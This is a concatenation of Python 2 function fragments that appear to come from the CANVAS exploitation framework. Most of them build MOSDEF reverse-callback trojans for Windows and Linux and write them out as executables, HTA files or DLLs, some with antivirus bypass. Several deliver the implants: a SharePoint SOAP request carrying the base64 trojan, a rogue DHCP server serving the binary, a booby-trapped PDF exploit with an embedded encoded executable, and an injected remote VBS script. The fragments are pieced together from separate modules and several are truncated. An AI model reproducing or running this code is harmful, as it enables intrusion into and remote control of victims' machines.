def maketrojan(self):
t_os = canvasos("Windows")
t_os.arch = "X86"
self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os = t_os, http=True, ssl=self.useSSL)
self.log("Writing out %d bytes to %s"%(len(self.mosdeftrojan), self.trojannamew))
self.setInfo("%s - done"%(NAME))
ret = len(self.mosdeftrojan) != 0
return ret
def maketrojan(self):
from libs.canvasos import canvasos
my_os = canvasos('Linux')
my_os.arch = 'X86'
self.log("[D2] Creating a callback to %s:%s"%(self.callback.ip, self.callback.port))
if not self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=my_os, universal=True):
return 0
file(self.trojanname, "wb").write(self.mosdeftrojan)
ret = len(self.mosdeftrojan) != 0
return ret
def maketrojan(self):
t_os = canvasos("Windows")
t_os.arch = "X64"
self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os = t_os)
self.log("Writing out %d bytes to %s"%(len(self.mosdeftrojan), self.trojanname))
self.htafile = self.file4hta(self.mosdeftrojan)
file(self.trojanname, "wb").write(self.htafile)
self.setInfo("%s - done"%(NAME))
ret = len(self.mosdeftrojan) != 0
def maketrojan(self):
t_os = canvasos("Linux")
t_os.arch = "X86"
self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os = t_os)
self.log("Writing out %d bytes to %s"%(len(self.mosdeftrojan), self.trojanname))
file(self.trojanname, "wb").write(self.mosdeftrojan)
self.setInfo("%s - done"%(NAME))
ret = len(self.mosdeftrojan) != 0
return ret
def gen_trojan(self):
self.log("[D2] Building MOSDEF Trojan")
t_os = canvasos('WINDOWS')
t_os.arch = 'X86'
mosdef = os.path.join(self.respath, self.mosdef.split('\\')[-1:][0])
try:
self.buildmosdeftrojan(self.callback_host, self.callback_port, t_os, universal=True)
self.log("Writing out %d bytes to %s"%(len(self.mosdeftrojan),mosdef))
file(mosdef,"wb").write(self.mosdeftrojan)
except Exception, e:
self.log(e)
return 0
def build_mosdef_callback(self):
t_os = canvasos("Linux")
t_os.arch = self._arch
try:
ret = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True)
if ret:
return self.mosdeftrojan
except Exception, err:
logging.error("Error while building MOSDEF callback: %s" %
str(err))
def maketrojan(self):
from libs.canvasos import canvasos
my_os = canvasos(self.platform)
my_os.arch = self.arch
self.log("Creating a callback to %s:%s" %
(self.callback.ip, self.callback.port))
if not self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=my_os,
universal=True):
return ''
base64data = base64.encodestring(self.mosdeftrojan)
return base64data
def maketrojan(self):
t_os = canvasos("Windows")
t_os.arch = "X86"
self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
http=True,
target_os=t_os)
self.log("Writing out %d bytes to %s" %
(len(self.mosdeftrojan), self.binname))
ret = len(self.mosdeftrojan) != 0
return ret
def maketrojan(self):
t_os = canvasos(targets[self.version])
t_os.arch = "X86"
if self.version == 0:
self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os)
self.log("Writing out %d bytes to %s" %
(len(self.mosdeftrojan), self.trojanname))
self.htafile = self.file4hta(self.mosdeftrojan)
file(self.trojanname, "wb").write(self.htafile)
self.setInfo("%s - done" % (NAME))
ret = len(self.mosdeftrojan) != 0
else:
from MOSDEF import makeexe
from MOSDEF.cc import threadsafe_cc_main
self.log("[!] Compiling Unix trojan")
infilename = "backdoors/cback_mmap_rwx.c"
vars = {}
vars['CBACK_PORT'] = self.callback.port
vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip))
self.log("[!] Callback address is %s" % vars['CBACK_ADDR'])
cc_command = []
for var in vars:
cc_command += ["-D", "%s=%s" % (var, vars[var])]
cc_command += [
"-d", "-v", "-m", "Linux", "-p", "i386", "-k", "None",
infilename
]
self.log("[!] CC command: %s" % cc_command)
mosdeftrojan = threadsafe_cc_main(cc_command)
if not mosdeftrojan:
self.log("[X] Was unable to create trojan!")
return ""
self.log("[!] Length of CC compiled trojan: %s" %
len(mosdeftrojan))
self.log("[!] Writing out %d bytes to %s" %
(len(mosdeftrojan), self.trojanname))
file(self.trojanname, "wb").write(mosdeftrojan)
ret = len(mosdeftrojan) != 0
return ret
def set_up_tftp_server(self):
self.log("building the MOSDEF trojan")
t_os = canvasos("Windows")
t_os.arch = "X86"
t_os.version = "XP"
try:
self.log("HTTP: %d, SSL: %d" % (self.HTTP,self.SSL))
mosdeftrojan = self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=t_os, http=self.HTTP, ssl=self.SSL)
except Exception, err:
self.log("Problem building the MOSDEF trojan: %s"%(err))
self.setInfo("%s - failed" % (NAME))
return 0
def run(self):
self.getargs()
self.setInfo("%s (in progress)" % (NAME))
t_os = canvasos(self.OS)
t_os.arch = self.ARCH
self.log("Building MOSDEF trojan for: %s %s" % (t_os, t_os.arch))
self.log('Universal: %s' % self.Universal)
self.log('Encrypted: %s' % self.encrypted)
try:
ret = self.buildmosdeftrojan(self.callback_host, self.callback_port, target_os=t_os, http=self.HTTP, ssl=self.SSL, universal=self.Universal, encrypted=self.encrypted)
except Exception, err:
self.log("Problem building the MOSDEF trojan: %s"%(err))
self.setInfo("%s - failed" % (NAME))
return 0
def __build_universal_trojan(self):
res = True
logging.info("Creating MOSDEF Trojans for ip: %s and port: %s" %
(str(self.callback.ip), str(self.callback.port)))
t_os = canvasos("WINDOWS")
t_os.arch = "X86"
try:
ret = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True)
if ret:
filename = os.path.join(self.tmppath, "callback_windows.exe")
with open(filename, "wb") as f:
f.write(self.mosdeftrojan)
except Exception, err:
logging.error("Problem building MOSDEF trojan: %s" % str(err))
res = False
def maketrojan(self):
from libs.canvasos import canvasos
my_os = canvasos(self.os)
my_os.arch = 'X86'
self.log("Creating a callback to %s:%s" %
(self.callback.ip, self.callback.port))
if not self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=my_os,
universal=True):
return 0
if self.os == "Windows":
self.htafile = self.file4hta(self.mosdeftrojan)
file(self.trojanname, "wb").write(self.htafile)
self.setInfo("%s - done" % (NAME))
else:
file(self.trojanname, "wb").write(self.mosdeftrojan)
ret = len(self.mosdeftrojan) != 0
return ret
def gen_trojan(self):
self.log("[D2 LOG] Building MOSDEF Trojan")
t_os = canvasos(self.OS)
t_os.arch = self.ARCH
mosdef = os.getcwd(
) + "/3rdparty/D2SEC/exploits/d2sec_svcwrapper/" + self.mosdef.split(
'\\')[-1:][0]
self.buildmosdeftrojan(self.callback_host,
self.callback_port,
target_os=t_os)
self.log("Writing out %d bytes to %s" %
(len(self.mosdeftrojan), mosdef))
file(mosdef, "wb").write(self.mosdeftrojan)
self.log("\n")
return len(self.mosdeftrojan)
def build_universal_trojans(self, http=False, ssl=False):
res = True
t_os = canvasos("WINDOWS")
for arch in ("X86", "X64"):
t_os.arch = arch
try:
ret = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True,
http=http,
ssl=ssl)
if ret:
filename = os.path.join(self.respath,
"callback_%s.exe" % arch)
with open(filename, "wb") as f:
f.write(self.mosdeftrojan)
except Exception, err:
self.log("Problem building MOSDEF trojan: %s" % str(err))
res = False
def run(self):
self.getargs()
self.setInfo("%s (in progress)" % NAME)
if not self.host:
self.log(
'Error: MOSDEF DLL needs a listener ip to connect back to.')
return 0
if not self.port:
self.log(
'Error: MOSDEF DLL needs a listener port to connect back to.')
return 0
self.log('Using listener ip: %s and port: %d' % (self.host, self.port))
if not self.http: self.log('Universal: %s' % self.universal)
self.log('64 bits: %s' % self.bits64)
if self.http:
self.log('HTTP: True')
self.log('SSL: %s' % self.http_ssl)
tos = canvasos('Windows')
if self.bits64: tos.arch = 'x64'
self.buildmosdeftrojan(self.host,
self.port,
target_os=tos,
universal=self.universal,
encrypted=False,
dll=True,
http=self.http,
ssl=self.http_ssl,
win8_compatible=True)
try:
with open(self.filename, 'wb') as f:
f.write(self.mosdeftrojan)
except Exception, ex:
self.log(traceback.format_exc(5))
return 0
def create_dll_file(self, win64=0):
pelib = PElib(win64=win64)
# Create the dll in memory
shellcode = None
buffer = None
if not win64:
shellcode = self.createShellcode()
buffer = pelib.createPEFileBuf({"DllMain": shellcode}, gui=False)
return buffer
else:
tos = canvasos("Windows")
tos.arch = 'x64'
text = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=tos,
universal=True,
encrypted=False,
dll=True,
win8_compatible=True)
return self.mosdeftrojan
def build_universal_trojans(self, http=False, ssl=False):
res = True
self.log("Creating MOSDEF Trojans for ip: %s and port: %s" % (str(self.callback.ip), str(self.callback.port)))
for platform in ("Windows", "Linux"):
t_os = canvasos(platform)
for arch in ("X86", "X64"):
t_os.arch = arch
# nasty way of creating an x64 binary for linux... x64 is still not supported
if platform == "Linux" and arch == "X64":
t_os.arch = "X86"
try:
ret = self.buildmosdeftrojan(self.callback.ip, self.callback.port,
target_os=t_os, universal=True,
http=http, ssl=ssl)
if ret:
filename = os.path.join(self.tmppath, "callback_%s_%s.exe" % (platform.lower(), arch))
with open(filename,"wb") as f:
f.write(self.mosdeftrojan)
except Exception, err:
self.log("Problem building MOSDEF trojan: %s" % str(err))
res = False
def run(self):
self.getargs()
self.setInfo("%s (in progress)" % (NAME))
node = self.argsDict["passednodes"][0]
t_os = canvasos(self.OS)
t_os.arch = self.ARCH
# these set self.mosdeftrojan with the binary data ..
self.buildmosdeftrojan(self.callback_host,
self.callback_port,
target_os=t_os,
http=self.HTTP,
ssl=self.SSL)
self.log("Writing out %d bytes to %s" %
(len(self.mosdeftrojan), self.filename))
file(self.filename, "wb").write(self.mosdeftrojan)
self.setInfo("%s - done" % (NAME))
return len(self.mosdeftrojan) != 0
def run(self):
self.node = self.argsDict['passednodes'][0]
if 'linux' not in self.node.capabilities:
self.log('[!] Not a linux node ...')
return 0
#self.log('[+] Randomizing remote paths..')
#self.remote_exploit = self.remote_exploit + self.random_str(5)
#self.remote_cback = self.remote_cback + self.random_str(5)
self.log('[+] Remote path to exploit: %s' % self.remote_exploit)
self.log('[+] Remote path to callback: %s' % self.remote_cback)
self.log("Creating MOSDEF callback for ip: %s and port: %s" %
(self.callback.ip, self.callback.port))
platform = "Linux"
t_os = canvasos(platform)
t_os.arch = "X86"
try:
ret = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True)
if ret:
self.local_cback = os.path.join(
self.tmppath,
"callback_%s_%s" % (platform.lower(), t_os.arch))
with open(self.local_cback, "wb") as f:
f.write(self.mosdeftrojan)
self.log("[+] Done creating callback")
else:
raise Exception('buildmosdeftrojan returned False')
except Exception, err:
self.log("[!] Error building MOSDEF callback: %s" % err)
return 0
def create_native_callback(self):
"""
Build a MOSDEF callback binary
"""
if not self.callback:
logging.error('No callback set')
return False
try:
t_os = canvasos('Windows')
t_os.arch = self.arch.upper()
try:
# Now that we have av_bypass encrypted is not needed
ret = self.buildmosdeftrojan(
self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True,
#encrypted=True,
av_bypass=True)
except Exception as e:
logging.error("Error while building MOSDEF callback: %s" %
(str(e)))
return False
# write out the binary
logging.info('Writing callback trojan to %s' % self.local_callback)
fd = open(self.local_callback, 'wb')
fd.write(self.mosdeftrojan)
fd.close()
except Exception as e:
logging.error(
"An error occurred while generating mosdef callback (%s)" %
str(e))
return False
return True
def maketrojan(self):
t_os = canvasos("Windows")
t_os.arch = "X86"
self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
http=True,
ssl=self.useSSL)
self.log("Writing out %d bytes to %s" %
(len(self.mosdeftrojan), self.trojanname))
self.htafile = self.file4hta(self.mosdeftrojan)
file(self.exploitpath + self.vbsfile, "wb").write(self.htafile)
tmp = file(self.exploitpath + self.filecwxtmp, "rb").read()
vbs = "<SCRIPT language=vbs src=\\\\" + self.callback.ip + "\\d\\" + self.vbsfile + "></SCRIPT>"
file(self.exploitpath + self.filecwx,
"wb").write(tmp[:-(len(vbs))] + vbs)
self.setInfo("%s - done" % (NAME))
ret = len(self.mosdeftrojan) != 0
return ret
def run(self):
self.getargs()
self.setInfo("%s (in progress)" % (NAME))
t_os = canvasos(self.OS)
# Create the object mosdef_powershell
ps_mosdef = mosdef_powershell()
logging.info("Building Powershell MOSDEF Callback Script")
try:
ps_mosdef.setup(self.callback_host,
self.callback_port,
mosdef_type=23,
mosdef_id=self.engine.getNewMosdefID(self))
self.psmosdefcallback = ps_mosdef.createMosdefCallback()
except Exception, err:
import traceback
traceback.print_exc()
logging.error("Error while building PowerShell callback (%s)" %
(err))
self.setInfo("%s - failed" % (NAME))
return 0
def create_callback(self, arch):
"""
Build the MOSDEF callback trojan. On x64 capabable
systems we use the x64 callback.
"""
if not self.callback:
logging.error('No callback set')
return False
try:
t_os = canvasos('Windows')
t_os.arch = arch
try:
ret = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True,
encrypted=True)
except Exception as e:
logging.error("Error while building MOSDEF callback: %s" %
(str(e)))
logging.info("%s - failed" % (NAME))
return False
# write out the binary
src = self.local_callback
logging.info('Writing callback trojan in %s' % src)
fd = open(src, 'wb')
fd.write(self.mosdeftrojan)
fd.close()
except Exception as e:
if self.debug_errors:
logging.debug('create_callback() failed: %s' % str(e))
logging.error("An errorr occurred while creating mosdef callback")
return False
return True
def maketrojan(self):
t_os = canvasos("Windows")
t_os.arch = "X86"
self.buildmosdeftrojan(self.callback.ip, self.callback.port, http=True, target_os = t_os)
self.htafile = self.file4hta(self.mosdeftrojan)
def create_shellcode(self):
t_os = canvasos("Linux")
t_os.arch = "X86"
ret = self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=t_os, universal=True)
return self.mosdeftrojan
def run(self):
# get callback
self.iface = self.callback.parent.interface
#print "callback ip: ", self.callback.ip, " ,port: ", self.callback.port, " ,iface: ",self.iface
# filename
import string, random
self.filename = "".join(
[random.choice(string.uppercase) for x in range(4)])
# create DGRAM socket to send dhcp answers
self.dhcpd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.dhcpd.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.dhcpd.bind(('', 67))
# Testing broadcast:
#self.dhcpd.sendto("AAAAAAAA",("<broadcast>", 68))
# build new mosdef trojan
t_os = canvasos("Linux")
t_os.arch = "X86"
t_os.version = "2.6"
ret = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
http=False,
ssl=False,
universal=True)
if not ret: print '[+] Error building mosdef trojan'
# upload_server:
from ExploitTypes.CommandLineExecuter import tcp_upload_listener
tul = tcp_upload_listener()
tul.data = self.mosdeftrojan
# for gettcplistener from canvasexploit
tul.getsock = self
# listen
self.fileport = 0
while not self.fileport:
self.fileport = random.randint(1, 65535)
try:
tul.listen(self.fileport)
#print "tul success with port: ", self.fileport
except:
#print "tul didnt success with port: ", self.fileport
self.fileport = 0
self.log("Serving file at port: %d" % self.fileport)
# init sniffer ... XXX: iface setting ???
if hasattr(self, 'engine') and \
hasattr(self.engine, 'localsniffer') and \
hasattr(self.engine.localsniffer, 'running') and \
self.engine.localsniffer.running():
sniff = self.engine.localsniffer
else:
sniff = localsniffer.localsniffer()
sniff.start()
self.log("Sniffer started")
# register callback
sniff.registercallback(self.dhcp_callback, 'layer(ethernet)')
self.log("Callback registered")
# ...
while self.interrupt == False:
# handle connections to serve file
tul.accept()
if tul.send_file():
# make netcat close on the other side
tul.fd.close()
tul.fd = None
# and return, we succeed
break
# interrupt on success (or whatever)
time.sleep(0.5)
# close listener
tul.close()
# shutdown sniffer
sniff.unregistercallback(self.dhcp_callback)
sniff.shutdown()
return None
def run(self):
"""
Actually exploit the target.
"""
self.getargs()
content = """<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Header>
<h4:__CallContext href="#ref-3" xmlns:h4="http://schemas.microsoft.com/clr/soap/messageProperties" SOAP-ENC:root="1"/>
<a1:LogicalCallContext id="ref-3" xmlns:a1="http://schemas.microsoft.com/clr/ns/System.Runtime.Remoting.Messaging">
<E2ETrace.ActivityID xsi:type="a2:Guid" xmlns:a2="http://schemas.microsoft.com/clr/ns/System">
<_a>0</_a>
<_b>0</_b>
<_c>0</_c>
<_d>27</_d>
<_e>3</_e>
<_f>0</_f>
<_g>128</_g>
<_h>0</_h>
<_i>0</_i>
<_j>0</_j>
<_k>238</_k>
</E2ETrace.ActivityID>
</a1:LogicalCallContext>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<i5:ConvertFile id="ref-1" xmlns:i5="http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface">
<launcherUri id="ref-6">http://HOST:PORT/HtmlTrLauncher</launcherUri>
<appExe id="ref-7">PdfPageConverter.exe</appExe>
<convertFrom id="ref-8">..\\..\\..\\..\\TransformApps\\PdfPageConverter.exe</convertFrom>
<convertTo id="ref-9">html</convertTo>
<fileBits href="#ref-10"/>
<taskName id="ref-11">empty.docxdoctrans</taskName>
<configInfo id="ref-12"><RcaTransformation><ConverterSettings SourceDocLibUrl="/Docs/Documents"></ConverterSettings><TransformationContext><TransformationStateStore xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><IsUpdate>false</IsUpdate><LayoutBodyFieldId>f55c4d88-1f2e-4ad9-aaa8-819af4ee7ee8</LayoutBodyFieldId><LayoutStylesFieldId>a932ec3f-94c1-48b1-b6dc-41aaa6eb7e54</LayoutStylesFieldId><PageSiteId>58bae916-c04a-4855-b737-5399c3d8eca4</PageSiteId><PageWebId>7477f6ab-0b45-48c4-9a07-115f70a5689c</PageWebId><PageUrl>Pages/empty.aspx</PageUrl></TransformationStateStore></TransformationContext></RcaTransformation></configInfo>
<timeout>300</timeout>
<fReturnFileBits>true</fReturnFileBits>
</i5:ConvertFile>
<SOAP-ENC:Array id="ref-10" xsi:type="SOAP-ENC:base64">SHELLCODE</SOAP-ENC:Array>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""
t_os = canvasos('Windows')
t_os.arch = self.arch
self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
http=False,
ssl=False,
universal=True,
encrypted=False)
trojan = base64.b64encode(self.mosdeftrojan)
content = content.replace('PORT', str(self.port))
hostname = socket.gethostbyaddr(self.host)[0]
content = content.replace('HOST', hostname)
content = content.replace('SHELLCODE', trojan)
addr = self.host + ':' + str(self.port)
conn = httplib.HTTP(addr)
conn.putrequest("POST", "/HtmlTrLauncher")
conn.putheader("Content-type", 'text/xml; charset="utf-8"')
conn.putheader(
"User-Agent",
"Mozilla/4.0+(compatible; MSIE 6.0; Windows 6.1.7601.65536; MS .NET Remoting; MS .NET CLR 2.0.50727.5420 )"
)
conn.putheader(
"SOAPAction",
"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface#ConvertFile"
)
conn.putheader("Host", addr)
conn.putheader("Content-length", "%d" % len(content))
conn.endheaders()
conn.send(content)
def makePDF(self):
#Open the sample PDF
reader = PdfFileReader(file(self.sample_pdf, 'rb'))
#Add our executable
from libs.canvasos import *
t_os = canvasos('WINDOWS')
t_os.arch = 'X86'
trojan = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
t_os,
universal=True)
exe = self.mosdeftrojan
exe_len = len(exe)
total_len = PDF_OVERHEAD + exe_len
payload_exe = 'M'
for i in range(1, exe_len):
payload_exe += chr(ord(exe[i]) ^ 0x12)
exeobj = StreamObject()
exeobj._data = payload_exe
#Extract and modify the U3D data (exploit trigger)
u3dobj = IndirectObject(10, 0, reader).getObject()
u3ddata = decodeStreamData(u3dobj)
#u3ddata = string.replace(u3ddata, "RRR", "\x0c\x0c\x0c")
#u3ddata = string.replace(u3ddata, "RR", "\x0c\x0c")
u3ddata = string.replace(u3ddata, "RRRR", "\x0c\x0c\x0c\x1c")
u3dobj._data = u3ddata
u3dobj[NameObject('/Filter')] = NullObject()
#Extract and modify the Javascript
jsobj = reader.trailer['/Root']['/OpenAction']['/JS'].getObject()
jsdata = FlateDecode.decode(jsobj._data, None)
jsdata = string.replace(jsdata, '\x00', '>')
jsdata = ASCIIHexDecode.decode(jsdata, None)
jsdata = string.replace(jsdata, "9b97MM9b9b", "xxSSxx")
jsdata = string.replace(jsdata, "9b9bMM9b9b", "9b9bMM8b9b")
jsdata = string.replace(jsdata, "xxSSxx", "9b97MM9b9b")
jsdata = string.replace(jsdata, "0c0cMM0c0c", "0c0cMM1c0c")
jsdata = string.replace(jsdata, '"M" + "M" + "0" + "c" + "0" + "c"',
'"MM"+"0c"+"0c"+"MM" + "1c" + "0c"')
#jsdata = string.replace(jsdata, "9090", "90cc") #Set an int 3
jsdata = string.replace(
jsdata, "ad2fMM9796",
self.jsEncodeDword(total_len)) #set the file length
jsdata = string.replace(
jsdata, "9ffe", "a234"
) #set the offset to the file data XXX: may change if any of the above code changes
jsdata = string.replace(
jsdata, "0b97MM9797",
self.jsEncodeDword(exe_len)) #set the length to write
#jump to the TerminateProcess code (skip dropping and opening a real PDF)
jsdata = string.replace(jsdata, "c21cMMc52bMMc268", "977eMM9795MMc297")
jsobj._data = jsdata
jsobj[NameObject('/Filter')] = NullObject()
#Close everything and write out the PDF
output = PdfFileWriter()
for num in range(0, reader.getNumPages()):
output.addPage(reader.getPage(num))
root = output._root.getObject()
root.update({NameObject('/OpenAction'):reader.trailer['/Root']['/OpenAction'],\
NameObject('/AcroForm'):reader.trailer['/Root']['/AcroForm'],\
NameObject('/PreviewImg'):exeobj})
outbuf = StringIO()
output.write(outbuf)
pdfdata = outbuf.getvalue()
f = open('new.pdf', 'wb')
f.write(pdfdata)
f.close()
self.log('Wrote pdf to new.pdf')
return pdfdata
